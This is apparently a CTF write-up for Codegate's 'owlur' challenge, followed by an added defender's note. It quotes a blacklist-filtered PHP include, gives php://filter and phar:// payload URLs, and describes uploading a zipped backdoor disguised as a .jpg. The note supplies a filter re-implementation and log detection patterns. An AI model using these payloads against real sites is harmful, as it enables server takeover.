Ourren

Following technology, recording life.

Bypassing file inclusion filters with Phar


A small solving trick for the owlur challenge in Codegate CTF. Testing showed the site has a file inclusion, and page source files can be read through php://filter; if you are not familiar with php://filter, it is worth studying:

http://x/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload
http://x/owlur/index.php?page=php://filter/string.rot13/resource=ndex

The content read back this way is encoded, so remember to decode it before reading the source. For example, rot13 can be undone on Linux with:

cat 1.php | rot13

The source confirms that the site has a file inclusion vulnerability. The original code is as follows:

<?php
// The page name comes straight from the request (GET or POST).
$p = $_REQUEST['page'];

if($p == "" || $p == "index")
{
    $p = "main";
}

// Banner shown when a check fails; the base64 string itself is omitted from the page.
$haq = base64_decode("<omitted base64 string>");
$haq = htmlentities($haq);

// Substring blacklist: only "..", "http" and "ftp" are rejected.
if(strstr($p,"..") !== FALSE)
    die("<pre>$haq</pre>");

if(stristr($p,"http") !== FALSE)
    die("<pre>$haq</pre>");

if(stristr($p,"ftp") !== FALSE)
    die("<pre>$haq</pre>");

// Length limit: the whole page value must stay under 60 characters.
if(strlen($p) >= 60)
    die("<pre>string > 60
$haq</pre>");

// ".php" is appended, then the result is included as-is.
$inc = sprintf("%s.php",$p);

?>
<?php
include($inc);
?>

So the page parameter is fully controllable: the program appends ".php" to whatever you pass and then includes the resulting filename.

The application also lets you upload images, but only jpg files. In fact it only checks that the filename ends with jpg, and when saving it renames the file to a random 6-character string plus .jpg, that is:

xxxx.jpg ----> random.jpg

It never checks whether the uploaded file is really an image, so the original file is stored as-is, just with its extension changed to .jpg. That means we can upload any file we need, but how to include it takes some thinking:

  • The uploaded file cannot be included directly, because a direct include would become xxx.jpg.php, which does not exist, and the resulting path exceeds the 60-character limit;
  • There is no null-byte truncation, because the PHP version is 5.5.x;
  • Remote inclusion filters http and ftp, so only other protocols remain; the first candidates that come to mind are data:// and php://input, but unfortunately both fail;

Checking the PHP manual shows that PHP supports the following wrappers:

  • file:// — Accessing local filesystem
  • http:// — Accessing HTTP(s) URLs
  • ftp:// — Accessing FTP(s) URLs
  • php:// — Accessing various I/O streams
  • zlib:// — Compression Streams
  • data:// — Data (RFC 2397)
  • glob:// — Find pathnames matching pattern
  • phar:// — PHP Archive
  • ssh2:// — Secure Shell 2
  • rar:// — RAR
  • ogg:// — Audio streams
  • expect:// — Process Interaction Streams

Setting aside the ones already tested, only the remaining wrappers were left, so I started testing file:// (no effect), SMB (works in a local setup, not in the target environment), ssh2:// (no luck); after trying many environments without success I put it aside for a while. [Note here: I found that spinning up a temporary DigitalOcean VPS for competitions is quite handy; switching it on and off costs little, and it comes with a public IP.]

Later someone on the team suggested trying phar://. Fine, I shamelessly gave it another go. Back when developing with yii2 I had used composer, which apparently also uses the phar extension, but I never paid attention to it; looking it up was a surprise: phar was introduced in PHP 5.3, and a phar is essentially a zip-packaged file, so...

So I grabbed a backdoor, compressed it into a zip, renamed the extension to .jpg, uploaded it successfully and obtained the stored file's address. The whole process can be described as:

phpspy.php->x.php->x.zip->x.jpg->upload->xsssa.jpg

Then I built the path and accessed it through phar://, and guess what, it worked and the flag came out:

http://54.65.205.135/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/O6i51MF.jpg/1

Here O6i51MF.jpg is a zip file containing a 1.php backdoor. I later heard that zip:// works the same way, so?
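As an added defender's note that is not part of the original write-up: the checks in the owlur source above are a substring blacklist, and the phar:// path passes every one of them. The Python below re-implements that blacklist, contrasts it with an allowlist of page names (the allowlist contents are an assumption), and flags any stream-wrapper scheme in a page parameter over constructed web-server log lines modelled on the requests in this post.

```python
import re
from urllib.parse import urlparse, parse_qs

def original_filter_accepts(p: str) -> bool:
    """The owlur include checks, re-implemented from the PHP above."""
    if p == "" or p == "index":
        p = "main"
    if ".." in p:                      # strstr($p, "..")
        return False
    if "http" in p.lower():            # stristr($p, "http")
        return False
    if "ftp" in p.lower():             # stristr($p, "ftp")
        return False
    if len(p) >= 60:                   # strlen($p) >= 60
        return False
    return True                        # include("$p.php") would run

# Hypothetical allowlist of real page names; anything else is rejected
# before it reaches include(), so no wrapper scheme or path can get through.
ALLOWED_PAGES = {"main", "upload"}

def hardened_accepts(p: str) -> bool:
    if p == "" or p == "index":
        p = "main"
    return p in ALLOWED_PAGES

# A URL scheme at the start of the page value means a stream wrapper, not a
# page name; this catches php://, phar://, zip://, data:// and the rest of
# the manual's list, not only the http/ftp substrings the original blocked.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def flag_wrapper_requests(log_lines):
    """Return the page= values in combined-format log lines that carry a scheme."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group(1)).query)
        for value in query.get("page", []):
            if SCHEME_RE.match(value):
                hits.append(value)
    return hits

# Constructed log lines modelled on the requests in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jan/2015:10:00:00 +0000] "GET /owlur/index.php?page=upload HTTP/1.1" 200 512',
    '10.0.0.5 - - [24/Jan/2015:10:00:01 +0000] "GET /owlur/index.php?page=php://filter/convert.base64-encode/resource=upload HTTP/1.1" 200 2048',
    '10.0.0.5 - - [24/Jan/2015:10:00:02 +0000] "GET /owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/O6i51MF.jpg/1 HTTP/1.1" 200 4096',
]
```

Running `flag_wrapper_requests(SAMPLE_LOG)` returns the two wrapper requests, while `original_filter_accepts` accepts the phar:// value and `hardened_accepts` rejects it.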